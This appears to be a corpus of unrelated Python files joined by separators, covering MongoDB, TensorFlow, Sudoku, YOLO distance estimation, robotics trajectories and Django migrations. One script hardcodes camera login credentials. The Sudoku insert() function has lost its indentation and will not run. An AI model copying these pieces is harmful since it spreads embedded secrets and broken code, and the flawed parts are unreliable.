        text=
        "Tener en cuenta que los mensajes de las colas se actualizan automaticamente una vez enviados."
    )
    return mensajeEmbed
|
from pymongo import MongoClient
import pymongo
class DBConnection:
    """Thin wrapper around a local MongoDB instance (database 'local').

    NOTE(review): `connection` and `db` are class attributes created at import
    time and shared across all instances — confirm that is intended.
    """
    connection = MongoClient()
    db = connection['local']

    def getLastMsgId(self):
        """Return the single lookup document (or None) from discord_message_lookup."""
        collection = self.db['discord_message_lookup']
        res = collection.find_one()
        return res

    def addNewMsg(self, msg_dict):
        """Insert a message document and return its ObjectId."""
        collection = self.db['discord_message']
        doc = collection.insert_one(msg_dict)
        return doc.inserted_id

    def updateMessageLookup(self, message_id, timestamp):
        """Upsert the singleton lookup document with the latest message id and timestamp.

        NOTE(review): Collection.update() was removed in pymongo 4 — migrate
        to update_one() when upgrading the driver.
        """
        newvalues = { "$set": { 'message_id': message_id , "timestamp": timestamp} }
        collection = self.db['discord_message_lookup']
        doc = collection.update({}, newvalues, upsert=True)
        return doc

    def getLastInsertedMessage(self):
        """Return the most recently inserted message (highest _id)."""
        collection = self.db['discord_message']
        doc = collection.find_one(sort=[( '_id', pymongo.DESCENDING )])
        return doc
|
def strDiag(strInput):
    """Print the string diagonally: character i on its own line, shifted i spaces right."""
    for offset, ch in enumerate(strInput):
        print(' ' * offset, ch)
stringInput = input("Enter string: ")
strDiag(stringInput) |
import tensorflow as tf
def _run(op):
    """Evaluate op in a fresh TF1 session and print the result."""
    with tf.Session() as sess:
        print(sess.run(op))

# demo1: a lone scalar constant
a = tf.constant(3, name='a')
_run(a)
# demo2: scalar + scalar
a = tf.constant(3, name='a')
b = tf.constant(4, name='b')
_run(a + b)
# demo3: vector + vector (same shape)
a = tf.constant([1, 2, 3], name='a')
b = tf.constant([4, 5, 6], name='b')
_run(a + b)
# demo4: vector + scalar (scalar broadcast)
a = tf.constant([1, 2, 3], name='a')
b = tf.constant(4, name='b')
_run(a + b)
# demo5: matrix + matrix (same shape)
a = tf.constant([[1, 2, 3], [4, 5, 6]], name='a')
b = tf.constant([[1, 2, 3], [4, 5, 6]], name='b')
_run(a + b)
# demo6: matrix + scalar
a = tf.constant([[1, 2, 3], [4, 5, 6]], name='a')
b = tf.constant(100, name='b')
_run(a + b)
# demo7: matrix + row vector (row broadcast)
a = tf.constant([[1, 2, 3], [4, 5, 6]], name='a')
b = tf.constant([100, 101, 102], name='b')
_run(a + b)
# demo8 (does not work): (2,3) + (2,) shapes are not broadcast-compatible
# demo9: matrix + column vector (column broadcast)
a = tf.constant([[1, 2, 3], [4, 5, 6]], name='a')
b = tf.constant([[100], [101]], name='b')
_run(a + b)
print(a.shape)
print(b.shape)
|
"""
Given an integer array nums, find the contiguous subarray (containing at least one number)
which has the largest sum and return its sum.
Constraints:
1 <= nums.length <= 3 * 104
-105 <= nums[i] <= 105
Follow up: If you have figured out the O(n) solution, try coding another solution using
the divide and conquer approach, which is more subtle.
"""
from typing import List
def max_subarray(nums: List[int]) -> int:
    """Kadane's algorithm: largest sum over all non-empty contiguous subarrays."""
    best = running = nums[0]
    for value in nums[1:]:
        # Extend the current run only while it contributes positively.
        running = value + running if running > 0 else value
        if running > best:
            best = running
    return best
if __name__ == '__main__':
    # Sanity checks from the problem statement.
    for nums, expected in (
        ([-2, 1, -3, 4, -1, 2, 1, -5, 4], 6),
        ([1], 1),
        ([5, 4, -1, 7, 8], 23),
    ):
        assert max_subarray(nums) == expected
|
# You are to write program to convert degrees of Fahrenheit to Celsius.
# BUGFIX: the prompt string was missing its closing quote (SyntaxError).
print("What is the temperature in Fahrenheit?")
Fahrenheit = input("")
print((float(Fahrenheit) - 32) / 1.8)
|
import os
def load_config():
    """Select the Flask config class from the FLASK_ENV environment variable.

    'production' -> ProductionConfig; 'development', 'default', and any other
    value -> DevelopmentConfig.

    BUGFIX: an unrecognized FLASK_ENV previously fell through every branch and
    silently returned None.
    """
    mode = os.environ.get('FLASK_ENV', 'default')
    if mode == 'production':
        from config.production import ProductionConfig
        return ProductionConfig
    # 'development', 'default', and unknown values all share the dev config.
    from config.development import DevelopmentConfig
    return DevelopmentConfig
|
#### Imports ####
import sys, os, argparse
########################################################################################################################################################
#### arguments ####
def arguments(arg):
    """Parse command-line options, optionally chdir into --directory.

    Returns the tuple (kaks_file, group_file, output).
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-d", "--directory", dest="dir")
    parser.add_argument("-k", "--kaks", dest="kaks_file")
    parser.add_argument("-g", "--group_file", dest="group_file")
    parser.add_argument("-o", "--output", dest="output")
    opts = parser.parse_args()
    if opts.dir is not None:
        os.chdir(opts.dir)
    return (opts.kaks_file, opts.group_file, opts.output)
#### read ####
def read(fichier):
    """Return every line of *fichier*; print a message and exit if it is missing."""
    try:
        # `with` guarantees the handle is closed even if readlines() fails
        # (the old explicit open/close leaked it on a read error).
        with open(fichier, "r") as f:
            return f.readlines()
    except FileNotFoundError as e:
        print("Le fichier '", e.filename, "' n'existe pas")
        sys.exit(0)
#### comp ####
def comp(kaks, groups):
    """Join group lines with their ka/ks value.

    For each group line whose first two columns match a kaks line's first two
    columns, emit "<group line stripped>\t<kaks column 8>".
    """
    matches = []
    for group_line in groups:
        g = group_line.split()
        for kaks_line in kaks:
            k = kaks_line.split()
            if g[0] == k[0] and g[1] == k[1]:
                matches.append(group_line.strip() + "\t" + k[7])
    return matches
#### save ####
## Sauvegarde du fichier
def save(arg, out):
    """Write each element of *arg* to file *out*, one per line.

    Refuses to overwrite: if *out* already exists, print a warning and exit.
    A None *out* falls back to the default file name.
    """
    # Default output name
    if out is None:
        out = "positive_selection_pairs_with_expression_pattern"
    # BUGFIX: the old existence probe opened the file for reading and never
    # closed that handle; os.path.exists avoids the leak.
    if os.path.exists(out):
        print("Attention, ce fichier "+out+" existe déjà\nFermeture du programme\n")
        sys.exit(0)
    with open(out, "w") as f:
        for ele in arg:
            f.write(ele+"\n")
    print("Le fichier s'appellera "+out)
|
import pygame
import ctypes # for pop-up window
from random import shuffle, randint  # for shuffling and generating random integers
from pprint import pprint  # to pretty-print the grid in the terminal as a 2-D array
# 9x9 board, row-major; 0 marks an empty cell.
sudokuGrid = [[0] * 9 for _ in range(9)]
def completeCheck(sudokuGrid):
    """True when no cell of the 9x9 grid is empty (0)."""
    return all(sudokuGrid[r][c] != 0 for r in range(9) for c in range(9))
# Candidate digits; shuffled in place before each cell is tried.
ordNumList = list(range(1, 10))
def fillsudokuGrid(sudokuGrid):
    """Backtracking solver/generator: fill every empty cell with a valid digit.

    Returns True once the grid is complete; relies on the module-level
    ordNumList being shuffled to randomize the generated solution.
    """
    # Find next empty cell
    for i in range(0, 81):
        row = i // 9  # 76 > 76//9 == 8 (stays same)
        col = i % 9   # 76 > 76%9 == 4 then goes to 5 then 6 then 7 then 8...
        if sudokuGrid[row][col] == 0:
            shuffle(ordNumList)
            for value in ordNumList:
                # Check that this value has not already be used on this row
                if not (value in sudokuGrid[row]):
                    # Check that this value has not already be used on this column
                    if not value in (
                            sudokuGrid[0][col], sudokuGrid[1][col], sudokuGrid[2][col], sudokuGrid[3][col],
                            sudokuGrid[4][col], sudokuGrid[5][col], sudokuGrid[6][col],
                            sudokuGrid[7][col], sudokuGrid[8][col]):
                        # Identify which of the 9 squares we are working on
                        square = []
                        if row < 3:
                            if col < 3:
                                square = [sudokuGrid[i][0:3] for i in range(0, 3)]
                            elif col < 6:
                                square = [sudokuGrid[i][3:6] for i in range(0, 3)]
                            else:
                                square = [sudokuGrid[i][6:9] for i in range(0, 3)]
                        elif row < 6:
                            if col < 3:
                                square = [sudokuGrid[i][0:3] for i in range(3, 6)]
                            elif col < 6:
                                square = [sudokuGrid[i][3:6] for i in range(3, 6)]
                            else:
                                square = [sudokuGrid[i][6:9] for i in range(3, 6)]
                        else:
                            if col < 3:
                                square = [sudokuGrid[i][0:3] for i in range(6, 9)]
                            elif col < 6:
                                square = [sudokuGrid[i][3:6] for i in range(6, 9)]
                            else:
                                square = [sudokuGrid[i][6:9] for i in range(6, 9)]
                        # Check that this value has not already be used on this 3x3 square
                        if not value in (square[0] + square[1] + square[2]):
                            sudokuGrid[row][col] = value
                            if completeCheck(sudokuGrid):
                                return True
                            else:
                                # Recurse on the rest of the grid; keep value on success.
                                if fillsudokuGrid(sudokuGrid):
                                    return True
            # No candidate fit this cell: stop scanning and backtrack below.
            break
    # Undo the last placement before returning to the caller (backtrack).
    sudokuGrid[row][col] = 0
# Generate a fully solved board, show it, and keep a working copy for the puzzle.
fillsudokuGrid(sudokuGrid)
pprint(sudokuGrid)
grid = [row.copy() for row in sudokuGrid]
def removek(k):
    """Blank out exactly k distinct filled cells of the module-level puzzle grid."""
    remaining = k
    while remaining:
        r, c = randint(0, 8), randint(0, 8)
        if grid[r][c] != 0:
            grid[r][c] = 0
            remaining -= 1
# Difficulty level: 1=quick test, 2=easy, 3=medium, 4=hard.
defaultLevel = 1
level = defaultLevel
def levelSelect(level):
    """Blank out cells according to the chosen difficulty (more removals = harder)."""
    removals = {1: 3, 2: 10, 3: 20, 4: 30}
    if level in removals:
        removek(removals[level])
WIDTH = 550   # width of game window (pixels)
HEIGHT = 700  # height of game window (pixels)
background_color = (255, 255, 255)  # background colour of game window
#################################
def levelSelectwindow():
    """Show the difficulty-selection screen and block until the user picks a
    level (each button calls levelSelect) or closes the window."""
    pygame.init()
    lswin = pygame.display.set_mode((WIDTH, HEIGHT))  # forming window
    pygame.display.set_caption("SUDOKU")  # assigning caption to window
    lswin.fill(background_color)  # giving colour to window
    lfont = pygame.font.SysFont('Comic Sans MS', 15)
    levelchoose = lfont.render('Choose Difficulty Level: ', True, (0, 0, 0))
    level1 = lfont.render('Quick Test', True, (0, 0, 0))
    level2 = lfont.render('Easy', True, (0, 0, 0))
    level3 = lfont.render('Medium', True, (0, 0, 0))
    level4 = lfont.render('Hard', True, (0, 0, 0))
    lswin.blit(levelchoose, (200 + 10, 50 + 10))
    # Four 200x50 buttons stacked at x=200, y=150/250/350/450.
    pygame.draw.rect(lswin, (255,255,0), [200, 150, 200, 50])
    lswin.blit(level1, (225 + 35, 150 + 10))
    pygame.draw.rect(lswin, (0,255,0), [200, 250, 200, 50])
    lswin.blit(level2, (225 + 35, 250 + 10))
    pygame.draw.rect(lswin, (0,255,255), [200, 350, 200, 50])
    lswin.blit(level3, (225 + 35, 350 + 10))
    pygame.draw.rect(lswin, (255,0,0), [200, 450, 200, 50])
    lswin.blit(level4, (225 + 35, 450 + 10))
    pygame.display.update()
    lselectmenu = 1
    while lselectmenu == 1:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:  # close the window
                pygame.quit()
                return
            mposefLevelSelection = pygame.mouse.get_pos()
            if event.type == pygame.MOUSEBUTTONDOWN:
                # Hit-test the click against each button rect.
                if 200 <= mposefLevelSelection[0] <= 400 and 150 <= mposefLevelSelection[1] <= 200:
                    levelSelect(1)
                    return
                if 200 <= mposefLevelSelection[0] <= 400 and 250 <= mposefLevelSelection[1] <= 300:
                    levelSelect(2)
                    return
                if 200 <= mposefLevelSelection[0] <= 400 and 350 <= mposefLevelSelection[1] <= 400:
                    levelSelect(3)
                    return
                if 200 <= mposefLevelSelection[0] <= 400 and 450 <= mposefLevelSelection[1] <= 500:
                    levelSelect(4)
                    return
##################################
# Run difficulty selection before building the main board UI.
levelSelectwindow()
original_grid_element_color = (52, 31, 151)  # color of number generated by default
buffer = 5  # constant value to make sudoku attractive
# Snapshot of the puzzle as presented; distinguishes given cells from user input.
grid_original = [[grid[x][y] for y in range(len(grid[0]))] for x in
                 range(len(grid))]  # copy of original grid - formed for checking the solution at last
# this function is created for inserting the input by the user in the grid
def insert(win, position):
i, j = position[1], position[0] # we will use i and j to made the update in grid variable
myfont = pygame.font.SysFont('Comic Sans MS',
35) # font of input given by the user and also used for default populated grid
while True:
for event in pygame.event.get(): # event which we are going to do
if event.type == pygame.QUIT: # closing game window
return
if event.type == pygame.KEYDOWN: # keyboard button is pressed
if grid_original[i - 1][j - 1] != 0: # means there is already some number on the grid . i.e original grid element is not empty
return
if event.key == 48: # if key = 0 bcz 48 is the ASCII value of 0
grid[i - 1][j - 1] = event.key - 48 # to update the grid variable
pygame.draw.rect(win, background_color, (
position[0] * 50 + buffer, position[1] * 50 + 2 * buffer, 50 - 3 * buffer,
50 - 3 * buffer)) # function is used to draw a rectangle
pygame.display.update() # to update the changes we have made
if 0 < event.key - 48 < 10: # if key = [1,9]
grid[i - 1][j - 1] = event.key - 48 # to update the grid variable
value = myfont.render(str(event.key - 48), True,
(0, 0, 255)) # render is used to make object of text
win.blit(value, (
position[0] * 50 + 15, position[1] * 50 + 5)) # blit is used to print object on the window
pygame.display.update()
return
return
def main():
    """Draw the board window, populate the puzzle, then run the event loop
    (cell input on left-click release, solution check via the button)."""
    pygame.init()  # initialising pygame
    win = pygame.display.set_mode((WIDTH, HEIGHT))  # forming window
    pygame.display.set_caption("SUDOKU")  # assigning caption to window
    win.fill(background_color)  # giving colour to window
    myfont = pygame.font.SysFont('Comic Sans MS', 24)  # font for populating the grid
    solnfont = pygame.font.SysFont('Comic Sans MS', 15)  # font for printing CheckSolution term on screen
    checkSolntext = solnfont.render('Check Solution', True, (0, 0, 0))  # rendering CheckSolution
    # Grid lines: thick every third line (3x3 boxes), thin otherwise.
    for i in range(0, 10):
        if i % 3 == 0:
            pygame.draw.line(win, (0, 0, 0), (50 + 50 * i, 50), (50 + 50 * i, 500), 4)  # darker vertical line
            pygame.draw.line(win, (0, 0, 0), (50, 50 + 50 * i), (500, 50 + 50 * i), 4)  # darker horizontal line
        pygame.draw.line(win, (0, 0, 0), (50 + 50 * i, 50), (50 + 50 * i, 500), 1)  # lighter vertical line
        pygame.draw.line(win, (0, 0, 0), (50, 50 + 50 * i), (500, 50 + 50 * i), 1)  # lighter horizontal line
    pygame.display.update()
    pygame.draw.rect(win, (255, 199, 189), [225, 600, 125, 40])  # rectangle for CheckSolution term
    win.blit(checkSolntext, (225 + 15, 600 + 10))  # blitting checkSolution on screen
    pygame.display.update()
    # Populate the board with the puzzle's given digits.
    for i in range(0, len(grid[0])):  # this whole for loop is for populating grid with numbers
        for j in range(0, len(grid[0])):
            if 0 < grid[i][j] < 10:
                value = myfont.render(str(grid[i][j]), True, (0, 0, 0))
                win.blit(value, ((j + 1) * 50 + 10, (i + 1) * 50 + 10))
    pygame.display.update()
    while True:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:  # close the window
                pygame.quit()
                return
            if event.type == pygame.MOUSEBUTTONUP and event.button == 1:  # mousebuttonup means mouse button release after pressing and left click (1 means)
                pos = pygame.mouse.get_pos()  # getting position of mouse
                insert(win, (pos[0] // 50, pos[1] // 50))  # on dividing by 50 to get the grid indices
            if event.type == pygame.MOUSEBUTTONDOWN:  # means mouse button pressed and it can be any click . it is used for clicking on checksolution term
                mousepos = pygame.mouse.get_pos()  # getting position of click
                if 225 <= mousepos[0] <= 365 and 600 <= mousepos[1] <= 650:
                    # Compare the user's grid to the solved board and show the
                    # verdict in a Windows-only (ctypes) message box.
                    if grid != sudokuGrid:
                        pprint(grid)
                        pprint(sudokuGrid)
                        ctypes.windll.user32.MessageBoxW(0, "Mission Failed, we'll get em next time", "OHHH NO!",
                                                         1)  # ctype is used for pop window
                    elif grid == sudokuGrid:
                        pprint(grid)
                        pprint(sudokuGrid)
                        ctypes.windll.user32.MessageBoxW(0, "You Won!!!", "CONGRATULATIONS", 1)
# Start the game (difficulty was already chosen above at import time).
main()
|
from com.ml.objects.Detection import ObjectDetection
from com.ml.utils.distance import Distance
import numpy as np
import os
import cv2
# initialize the known distance from the camera to the object, which
# in this case is 24 inches
# initialize the known distance from the camera to the object, which
# in this case is 24 inches
KNOWN_DISTANCE = 24.0
# initialize the known object width, which in this case, the piece of
# paper is 12 inches wide
KNOWN_WIDTH = 11.0
camera = cv2.VideoCapture("rtsp://admin:Digitalab_123@192.168.0.21")
detector = ObjectDetection()
detector.setModelTypeAsYOLOv3()
detector.setModelPath(os.path.join(os.getcwd(), "../ml-data-set/yolo.h5"))
detector.loadModel()
# BUGFIX: use None as the "no calibration frame yet" sentinel; comparing a
# numpy image against "" relies on fragile elementwise-comparison semantics.
firstImage = None
focalLength = None
while True:
    ret, frame = camera.read()
    cacheImagePath = "../cache/cache.jpg"
    cv2.imwrite(cacheImagePath, cv2.cvtColor(frame, cv2.COLOR_RGB2BGR))
    detected_copy, output_objects_array = detector.detectObjectsFromImage(input_image=cacheImagePath, input_type='file',
                                                                          output_type='array',
                                                                          minimum_percentage_probability=30)
    if len(output_objects_array) > 0:
        if firstImage is None:
            # First detection: calibrate the focal length from the known-size target.
            firstImage = frame
            marker = Distance.find_marker(firstImage)
            focalLength = (marker[1][0] * KNOWN_DISTANCE) / KNOWN_WIDTH
        else:
            # Subsequent detections: estimate distance and annotate the frame.
            marker = Distance.find_marker(detected_copy)
            inches = Distance.distance_to_camera(KNOWN_WIDTH, focalLength, marker[1][0])
            box = np.int0(cv2.boxPoints(marker))
            cv2.drawContours(detected_copy, [box], -1, (0, 255, 0), 2)
            cv2.putText(detected_copy, "%.2fft" % (inches / 12),
                        (detected_copy.shape[1] - 200, detected_copy.shape[0] - 20), cv2.FONT_HERSHEY_SIMPLEX,
                        2.0, (0, 255, 0), 3)
    cv2.imshow("image", detected_copy)
    key = cv2.waitKey(1) & 0xFF
    # if the `q` key was pressed, break from the loop
    if key == ord("q"):
        break
# Release video
camera.release()
cv2.destroyAllWindows()
|
from linear import matrix
import latex
import robotics
from sympy import symbols
import math
def insert(A, t):
    """Return a copy of symbolic matrix A with the symbol 't' replaced by the value t."""
    result = A.copy()
    for row in range(A.n):
        for col in range(A.m):
            result[row][col] = A[row][col].subs('t', t)
    return result
def solveABC(A, b):
    """Solve A·[a,b,c]^T = [value, 0, 0]^T for each boundary value in b.

    Returns one [a, b, c] coefficient triple per entry of b.
    """
    q = []
    for value in b:
        rhs = matrix([[value], [0], [0]])
        abc = A**-1 * rhs
        q.append([abc[0][0], abc[1][0], abc[2][0]])
    return q
def p4():
    """Print quintic joint trajectories q = a t^5 + b t^4 + c t^3 + q0 for five
    segments of a 4-DOF arm, each segment lasting t in [0, 2].

    NOTE(review): segment 2 re-solves with `first` (not `second`) and segment k
    generally uses the previous waypoint's coefficients — looks like a
    copy-paste slip; confirm against the assignment before changing.
    """
    t = symbols('t')
    # Boundary-condition matrix for position/velocity/acceleration of the quintic.
    A = matrix([[t**5, t**4, t**3],[5*t**4, 4*t**3, 3*t**2],[20*t**3, 12*t**2, 6*t]])
    A0 = insert(A,0)
    print(A0)
    A2 = insert(A,2)
    print(A2)
    first = [-0.321750554396642, -4.49454236888801 + 2*math.pi, 1.61941347407016, 2.92374604209311]
    abc1 = solveABC(A2, first)
    dof = 4  # decimal places for printing
    count = 1
    for i in range(len(abc1)):
        eq = "q{}{} = {}t^5 + {}t^4 + {}t^3 + {}\n".format(count, i+1, round(abc1[i][0], dof),round(abc1[i][1], dof),round(abc1[i][2], dof), round(first[i], dof))
        #eq += "dq{}{}/dt = {}t^4 + {}t^3 + {}t^2\n".format(count, i+1, round(5*abc1[i][0], dof),round(4*abc1[i][1],dof),round(3*abc1[i][2], dof))
        #eq += "d2q{}{}/dt2 = {}t^3 + {}t^2 + {}t\n".format(count, i+1, round(20*abc1[i][0], dof),round(12*abc1[i][1], dof), round(6*abc1[i][2]))
        print(eq)
    count = 2
    second = [0.26396372362570, -4.53174363933971 + 2*math.pi, 1.94807597387782, 2.96094731254482]
    abc1 = solveABC(A2, first)
    for i in range(len(abc1)):
        eq = "q{}{} = {}t^5 + {}t^4 + {}t^3 + {}\n".format(count, i+1, round(abc1[i][0], dof),round(abc1[i][1], dof),round(abc1[i][2], dof), round(first[i], dof))
        #eq += "dq{}{}/dt = {}t^4 + {}t^3 + {}t^2\n".format(count, i+1, round(5*abc1[i][0], dof),round(4*abc1[i][1],dof),round(3*abc1[i][2], dof))
        #eq += "d2q{}{}/dt2 = {}t^3 + {}t^2 + {}t\n".format(count, i+1, round(20*abc1[i][0], dof),round(12*abc1[i][1], dof), round(6*abc1[i][2]))
        print(eq)
    count = 3
    third = [-0.223476601140633, -4.55848107238232 + 2*math.pi, 2.28309001136617, 2.98768474558743]
    abc1 = solveABC(A2, second)
    for i in range(len(abc1)):
        eq = "q{}{} = {}t^5 + {}t^4 + {}t^3 + {}\n".format(count, i+1, round(abc1[i][0], dof),round(abc1[i][1], dof),round(abc1[i][2], dof), round(second[i], dof))
        #eq += "dq{}{}/dt = {}t^4 + {}t^3 + {}t^2\n".format(count, i+1, round(5*abc1[i][0], dof),round(4*abc1[i][1],dof),round(3*abc1[i][2], dof))
        #eq += "d2q{}{}/dt2 = {}t^3 + {}t^2 + {}t\n".format(count, i+1, round(20*abc1[i][0], dof),round(12*abc1[i][1], dof), round(6*abc1[i][2]))
        print(eq)
    count = 4
    fourth = [0.193621992855945, -4.57850459598843 + 2*math.pi, 2.62202212042538, 3.00770826919353]
    abc1 = solveABC(A2, third)
    for i in range(len(abc1)):
        eq = "q{}{} = {}t^5 + {}t^4 + {}t^3 + {}\n".format(count, i+1, round(abc1[i][0], dof),round(abc1[i][1], dof),round(abc1[i][2], dof), round(third[i], dof))
        #eq += "dq{}{}/dt = {}t^4 + {}t^3 + {}t^2\n".format(count, i+1, round(5*abc1[i][0], dof),round(4*abc1[i][1],dof),round(3*abc1[i][2], dof))
        #eq += "d2q{}{}/dt2 = {}t^3 + {}t^2 + {}t\n".format(count, i+1, round(20*abc1[i][0], dof),round(12*abc1[i][1], dof), round(6*abc1[i][2]))
        print(eq)
    count = 5
    fifth = [-0.170735211475283, -4.59401022420542 + 2*math.pi, 2.96352830254749, 3.02321389741052]
    abc1 = solveABC(A2, fourth)
    for i in range(len(abc1)):
        eq = "q{}{} = {}t^5 + {}t^4 + {}t^3 + {}\n".format(count, i+1, round(abc1[i][0], dof),round(abc1[i][1], dof),round(abc1[i][2], dof), round(fourth[i], dof))
        #eq += "dq{}{}/dt = {}t^4 + {}t^3 + {}t^2\n".format(count, i+1, round(5*abc1[i][0], dof),round(4*abc1[i][1],dof),round(3*abc1[i][2], dof))
        #eq += "d2q{}{}/dt2 = {}t^3 + {}t^2 + {}t\n".format(count, i+1, round(20*abc1[i][0], dof),round(12*abc1[i][1], dof), round(6*abc1[i][2]))
        print(eq)
def p5():
    """Print quintic Cartesian trajectories (p_x, p_y) between the five joint
    waypoints, evaluated through the manipulator's forward kinematics."""
    t = symbols('t')
    # Boundary-condition matrix for the quintic at time t.
    A = matrix([[t ** 5, t ** 4, t ** 3], [5 * t ** 4, 4 * t ** 3, 3 * t ** 2], [20 * t ** 3, 12 * t ** 2, 6 * t]])
    A0 = insert(A, 0)
    A2 = insert(A, 2)
    # Joint-space waypoints [th1, th2, d3, th4].
    points = [[-0.321750554396642, -4.49454236888801 + 2 * math.pi, 1.61941347407016, 2.92374604209311],
              [0.26396372362570, -4.53174363933971 + 2 * math.pi, 1.94807597387782, 2.96094731254482],
              [-0.223476601140633, -4.55848107238232 + 2 * math.pi, 2.28309001136617, 2.98768474558743],
              [0.193621992855945, -4.57850459598843 + 2 * math.pi, 2.62202212042538, 3.00770826919353],
              [-0.170735211475283, -4.59401022420542 + 2 * math.pi, 2.96352830254749, 3.02321389741052]]
    man = robotics.manipulator()
    man.addlink()
    man.addlink()
    man.addlink()
    man.addlink()
    J4 = man.H2()
    # Substitute the DH parameters; keep only the end-effector x/y expressions.
    B = robotics.insert(J4, a=[0, 0, 0, 1.15], th=[None, None, math.pi, None],
                        al=[-math.pi / 2, math.pi / 2, math.pi / 2, math.pi / 2], d=[1.7, 0, None, 0])
    B = [B[0][-1], B[1][-1]]
    A = matrix(5, 2)
    # Evaluate the forward kinematics at each waypoint (rounded to 3 places).
    for i in range(len(points)):
        t1 = B[0].subs('th1',points[i][0]).subs('th2',points[i][1]).subs('d3',points[i][2]).subs('th4',points[i][3])
        t2 = B[1].subs('th1',points[i][0]).subs('th2',points[i][1]).subs('d3',points[i][2]).subs('th4',points[i][3])
        A[i][0] = round(t1, 3)
        A[i][1] = round(t2, 3)
    # Pair consecutive waypoints into (start, end) segments.
    ini = [i for i in A[:-1]]
    fin = [i for i in A[1:]]
    r = 3  # decimal places for printing
    for i in range(len(fin)):
        q = solveABC(A2, fin[i])
        str = "p_x(t) = {}t^5 + {}t^4 + {}t^3 + {}\\\\\n".format(round(q[0][0],r), round(q[0][1],r), round(q[0][2],r),ini[i][0])
        str += "p_y(t) = {}t^5 + {}t^4 + {}t^3 + {}\\\\\n".format(round(q[1][0],r), round(q[1][1],r), round(q[1][2],r),ini[i][1])
        print(str)
def p6():
    """Build a 4-link (r, r, p, r) manipulator, print its Jacobian, then
    print the LaTeX rendering of the Jacobian with DH parameters substituted.
    """
    man = robotics.manipulator()
    for joint_type in ('r', 'r', 'p', 'r'):
        man.addlink(joint_type)
    J = man.Jacobian()
    print(J)
    # Substitute the numeric DH parameters into the symbolic Jacobian.
    B = robotics.insert(J, a=[0, 0, 0, 1.15], th=[None, None, math.pi, None],
                        al=[-math.pi / 2, math.pi / 2, math.pi / 2, math.pi / 2], d=[1.7, 0, None, 0])
    print(latex.Lmatrix(B.simplify(), num=['al', 'a', 'th', 'd']))
# Script entry point: p4 and p5 are earlier exercises, kept but disabled.
if __name__ == "__main__":
    #p4()
    #p5()
    p6()
#!/usr/bin/python3
"""Subscribe to a local ZeroMQ publisher and print incoming float arrays."""
import zmq
import numpy as np

port = 8887
context = zmq.Context()
socket = context.socket(zmq.SUB)
socket.connect("tcp://127.0.0.1:%s" % port)  # raspberry pi ip address
topicfilter = b""  # empty filter: receive every topic
socket.setsockopt(zmq.SUBSCRIBE, topicfilter)

while True:
    string = socket.recv()
    # np.fromstring is deprecated for binary input; frombuffer is the
    # supported (zero-copy) replacement and parses the same bytes.
    data = np.frombuffer(string, dtype="float")
    print(data)
|
# Generated by Django 2.1.7 on 2019-03-30 11:39
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: add nullable Pay and Working_Hour fields to
    GlobalNotification and make its Date field optional with a help text."""
    dependencies = [
        ('notification', '0004_auto_20190330_1439'),
    ]
    operations = [
        # New optional integer fields; null=True means existing rows need no default.
        migrations.AddField(
            model_name='globalnotification',
            name='Pay',
            field=models.PositiveIntegerField(null=True),
        ),
        migrations.AddField(
            model_name='globalnotification',
            name='Working_Hour',
            field=models.PositiveIntegerField(null=True),
        ),
        # Date becomes optional (blank in forms, NULL in the DB) and gains help text.
        migrations.AlterField(
            model_name='globalnotification',
            name='Date',
            field=models.DateField(blank=True, help_text='Please enter in the format mm/dd/yyyy', null=True),
        ),
    ]
|
# school = "Digital School"
# print("Digital Crafts")
# print("Digital Crafts")
# print("Digital Crafts")
# print("Digital Crafts")
# print("Digital Crafts")
# student1 = "Andrea"
# student2 = "Zach"
# student3 = "Michael"
# student4 = "Rick"
# "Good Morning"
# formatting = "{} {} {} {}".format(student1, student2, student3, student4)
# print(formatting)
# Simple f-string demo: announce today's and tomorrow's day names.
day = "Wednesday"
tomorrow = "Thursday"
currentDay = f"Today is {day}"
currentDay1 = f"Tomorrow is {tomorrow}"
for announcement in (currentDay, currentDay1):
    print(announcement)
"""For each image with a matching space-delimited CSV of box corners, draw
red rectangles around the boxes and save a copy whose filename carries the
detection count.  (The CSV is assumed to sit next to the image.)"""
import cv2
import numpy as np
import json
import re
import pandas as pd
import sys
import glob
import os
import csv

#IMAGE AND CSV FILE LOCATIONS THIS CODE ASSUMES THEY ARE IN THE SAME FOLDER
json_fns = glob.glob("E:\\lastresults\**\\*.jpg", recursive=True)
print(json_fns)

for image_path in json_fns:
    print(image_path)
    csv_path = image_path[:-4] + ".csv"
    if not os.path.exists(csv_path):
        continue
    # imdecode + np.fromfile instead of imread so non-ASCII Windows paths work.
    img = cv2.imdecode(np.fromfile(image_path, dtype=np.uint8),
                       cv2.IMREAD_UNCHANGED)
    # Read once (the original read the file twice); renamed from `input`
    # to avoid shadowing the builtin, and `with` already closes the file.
    with open(csv_path, 'r') as csv_file:
        rows = list(csv.reader(csv_file, delimiter=' '))
    # After the header line, rows come in groups of 4 — one group per bird.
    totalbird = str(int((len(rows) - 1) / 4))
    for idx, row in enumerate(rows):
        if idx == 0:
            continue  # ignoring first line for getting coordinates
        if idx % 4 == 1:
            coords = row[0].split(",")
            xmin = int(coords[1])
            ymin = int(coords[2])
        elif idx % 4 == 0:
            coords = row[0].split(",")
            xmax = int(coords[1])
            ymax = int(coords[2])
            # min coordinates, max coordinates, color (BGR red), thickness
            img = cv2.rectangle(img, (xmin, ymin), (xmax, ymax), (0, 0, 255), 3)
        # rows with idx % 4 in (2, 3) carry no corner data and are skipped
    out_path = image_path[:-4] + "_" + totalbird + ".jpg"  # save path
    # imencode + tofile mirrors the imdecode + fromfile trick for writing.
    is_success, im_buf_arr = cv2.imencode(".jpg", img)
    im_buf_arr.tofile(out_path)
|
# Generated by Django 3.1.7 on 2021-02-22 11:39
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: make Order.total an optional FloatField."""
    dependencies = [
        ('store', '0012_order_total'),
    ]
    operations = [
        migrations.AlterField(
            model_name='order',
            name='total',
            # blank=True allows empty form input; null=True allows NULL in the DB.
            field=models.FloatField(blank=True, null=True),
        ),
    ]
|
# Generated by Django 3.1.3 on 2020-12-12 17:28
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: create the Comment model with author/post FKs."""
    dependencies = [
        ('rareserverapi', '0003_auto_20201211_0140'),
    ]
    operations = [
        migrations.CreateModel(
            name='Comment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('content', models.TextField()),
